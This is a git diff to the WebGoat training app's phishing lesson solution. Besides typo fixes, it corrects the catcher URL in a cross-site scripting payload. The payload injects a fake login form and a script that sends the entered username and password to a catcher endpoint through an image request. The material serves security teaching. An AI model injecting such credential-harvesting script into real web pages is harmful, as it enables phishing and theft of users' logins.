diff --git a/webgoat/src/main/webapp/lesson_solutions/Phishing.html b/webgoat/src/main/webapp/lesson_solutions/Phishing.html index 24a0607df..c1ba6345d 100644 --- a/webgoat/src/main/webapp/lesson_solutions/Phishing.html +++ b/webgoat/src/main/webapp/lesson_solutions/Phishing.html @@ -18,17 +18,17 @@ hard for a victim to determinate that the content is malicious.

General Goal(s):
The user should be able to add a form asking for username and password. On submit the input should be sent to -http://localhostcatcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName +http://localhost/webgoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName

Solution:
-With XSS it is possible to add further elements to an exsisting Page. +With XSS it is possible to add further elements to an existing Page. This solution consists of two parts you have to combine: -A Form whith username and password could look like this:
+A Form with username and password could look like this:

<form><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" id="user" @@ -40,19 +40,19 @@ Now you need a script:

<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); -XSSImage=new Image; XSSImage.src="http://localhostcatcher?PROPERTY=yes&user="+ +XSSImage=new Image; XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";} </script>

This script will read the input from the form and send it to the catcher of WebGoat.

The last step is to put things together. Add a Button to the form which -calls the script. You can reach this wicht the onclick="myFunction" handler. +calls the script. You can reach this with the onclick="myFunction" handler.

The final String looks like this:
<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); -XSSImage=new Image; XSSImage.src="http://localhostcatcher?PROPERTY=yes&user="+ +XSSImage=new Image; XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";} </script><form><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" id="user"